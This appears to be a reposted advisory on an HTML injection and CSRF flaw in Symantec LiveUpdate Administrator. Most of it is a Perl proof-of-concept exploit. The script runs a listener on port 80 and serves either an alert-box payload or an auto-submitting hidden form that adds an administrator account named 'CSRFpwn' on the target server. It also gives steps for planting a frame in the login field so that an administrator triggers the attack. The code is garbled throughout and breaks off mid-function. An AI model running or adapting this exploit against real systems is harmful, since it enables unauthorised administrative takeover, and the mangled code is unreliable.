Symantec LiveUpdate Administrator HTML injection vulnerability and repair

Symantec LiveUpdate is a technology Symantec uses to automatically update Symantec virus definitions and products. The LiveUpdate client is provided with each Symantec product and automatically installs. LiveUpdate regularly connects to the LiveUpdate server to check for new updates to Symantec products installed on your computer. The Symantec LiveUpdate Administrator page has the HTML injection vulnerability, which may cause cross-site scripting attacks or malicious HTML code injection.

[+] Info:
~~~~~~~~~
Symantec LiveUpdate Administrator Management gui html Injection

[+] Poc:
~~~~~~~~~

View sourceprint? 001 #! /Usr/bin/perl

002

003 ##

004 # Title: Symantec Live Update Administrator CSRF Exploit

005 # Name: luaCSRF. pl

006 # Author: Nikolas Sotiriu (lofi) <lofi [at] sotiriu.de>

007 #

008 # Use it only for education or ethical pentesting! The author accepts

009 # no liability for damage caused by this tool.

010 #

011 ##

012

013

014 use Socket;

015 use IO: Handle;

016 use Getopt: Std;

017

018 my % args;

019 getopt (g: h:, \ % args );

020

021 my $ payload = $ args {g} | usage ();

022 my $ victim = $ args {h} | usage ();

023

024 banner ();

025

026 if ($ payload eq "1 "){

027 print "[+] Using the Alert Box payload ";

028 # Alert Box

029 $ html = <ENDHTML;

030

031 <script language = "JavaScript"> alert (!!! XSS/CSRF vulnerability !!!) </SCRIPT>

032

033

034 ENDHTML

035

036} elsif ($ payload eq "2 "){

037 print "[+] Using the add admin user payload ";

038 # Adds the user CSRFpwn with password 12345678

039 $ html = <ENDHTML;

040

041 <body onload = "document. csrf. submit ();">

042 <form name = "csrf" action = "http: // $ victim: 7070/lua/adduser. do" method = "post">

043 <input type = "hidden" name = "dispatch" value = "save"/>

044 <input type = "hidden" name = "username" value = "CSRFpwn"/>

045 <input type = "hidden" name = "password" value = "12345678"/>

046 <input type = "hidden" name = "verifyPassword" value = "12345678"/>

047 <input type = "hidden" name = "lastname" value = "junk"/>

048 <input type = "hidden" name = "firstname" value = "junk"/>

049 <input type = "hidden" name = "email" value = "junk@junk.com"/>

050 <input type = "hidden" name = "userRole" value = "1"/>

051 </form>

052 </body>

053

054

055 ENDHTML

056

057}

058

059 my $ protocol = getprotobyname (tcp );

060

061 socket (SOCK, AF_INET, SOCK_STREAM, $ protocol) or die "[-] socket () failed: $! ";

062 setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "[-] Cant set SO_REUSEADDR: $! ";

063 my $ my_addr = sockaddr_in (80, INADDR_ANY );

064 bind (SOCK, $ my_addr) or die "[-] bind () failed: $! ";

065 listen (SOCK, SOMAXCONN) or die "[-] listen () failed: $! ";

066 warn "[+] waiting for incoming connections on port 80 ...";

067 warn "[+] Enter the following String in the LUA username login field ";

068 warn "[+] (e. q. HTTP/SSH) and wair for the admin to view the Logs ";

069 warn "[+]";

070 warn "[+] <frame src = http: // <LOCAL_ADDRESS>/. html> ";

071

072 $ repeat = 1;

073 $ victim = inet_aton ("0.0.0.0 ");

074 while ($ repeat ){

075 my $ remote_addr = accept (SESSION, SOCK );

076 my ($ port, $ hisaddr) = sockaddr_in ($ remote_addr );

077 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port]";

078 $ victim = $ hisaddr;

079 SESSION-> autoflush (1 );

080 if (<SESSION> ){

081 print SESSION $ http_header. $ html;

082}

083 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port] finished ";

084 close SESSION;

085}

086

087 sub usage {

088 print $ payload;

089 print "";

090 print "luaCSRF. pl-Symantec lua csrf Exploit ";

091 print "========================================== ===================================== ";

092 print "Usage :";

093 print "$0-g <payload>-h <lua-ip> ";

094 print "Optional :";

095 print "-p <local port to listen on> ";

096 print "-g (1 | 2) <payload to use> ";

097 print "1 <Execute an alert box ";

098 print "2 <Add the Admin User" CSRFpwn "> ";

099 &